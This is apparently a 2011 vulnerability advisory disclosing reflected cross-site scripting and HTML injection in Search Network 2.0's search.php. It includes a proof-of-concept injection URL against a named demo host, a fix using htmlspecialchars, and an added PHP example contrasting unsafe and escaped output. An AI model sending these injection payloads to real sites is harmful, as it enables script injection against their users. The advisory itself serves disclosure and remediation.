Search Network version 2.0 suffers from a cross site scripting vulnerability.
d9bf46ed6a1fecbfe80387c0f55029774dcda72b7f9db79795d19a7ce123b926
##############################################################
[#] Script Name : Search Network 2.0
[#] Vulnerable Type : XSS Vulnerability
[#] Author : darkTR
[#] Date : 03.08.2011
[#] E-mail : darkTR@hotmail.com
[#] Target: : search.php?action=search_results&query=[XSS]
[#] Demo: : https://developer.searchnetworkhq.com/demo/search.php?
#############################################################
Exploits :
HTML INJECTION
https://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=><marquee>darkTR<%2Fmarquee>
XSS
https://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]
Fixing the vulnerability:
We can close the vulnerability by using htmlspecialchars. Open the index.php file and find:
$result = file_get_contents($url);
We should change this part as follows:
$result = htmlspecialchars(file_get_contents($url));
After the fix, characters such as ">,<" will be converted to HTML entities and the vulnerability will be eliminated.
darkTR | Code Hunters TIM
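
The htmlspecialchars fix described above, as an added example (not code from the advisory or from Search Network 2.0): it escapes the query value wherever it is written into the page, both in a text node and in an attribute. The function names and the markup are assumptions; the sample input is the string from the advisory's HTML-injection URL.

```php
<?php
// Added example: hypothetical helpers, not code from Search Network 2.0.

// Escape a value for an HTML text node or a quoted attribute value.
// Flags are passed explicitly: before PHP 8.1 the default (ENT_COMPAT)
// left single quotes unescaped, which matters inside '...' attributes.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": the query is concatenated into the markup unchanged.
function render_results_unsafe(string $query): string
{
    return "<h2>Results for $query</h2>\n"
         . "<input type='text' name='query' value='$query'>";
}

// "After": every reflection of the query goes through h().
function render_results_safe(string $query): string
{
    return '<h2>Results for ' . h($query) . "</h2>\n"
         . "<input type='text' name='query' value='" . h($query) . "'>";
}

// Constructed input: the HTML-injection string from the advisory's URL,
// as it arrives after PHP has URL-decoded $_GET['query'].
$query = '><marquee>darkTR</marquee>';

echo "--- unsafe ---\n", render_results_unsafe($query), "\n";
echo "--- safe ---\n", render_results_safe($query), "\n";

// A value containing a single quote stays inside a '...' attribute
// only when ENT_QUOTES is set; compare the two outputs.
$quoted = "a' b";
echo "--- ENT_COMPAT vs ENT_QUOTES ---\n";
echo htmlspecialchars($quoted, ENT_COMPAT, 'UTF-8'), "\n";
echo h($quoted), "\n";
```

Run it with the PHP CLI and compare the unsafe and safe output: in the safe version the angle brackets appear as entities in both the heading and the input value.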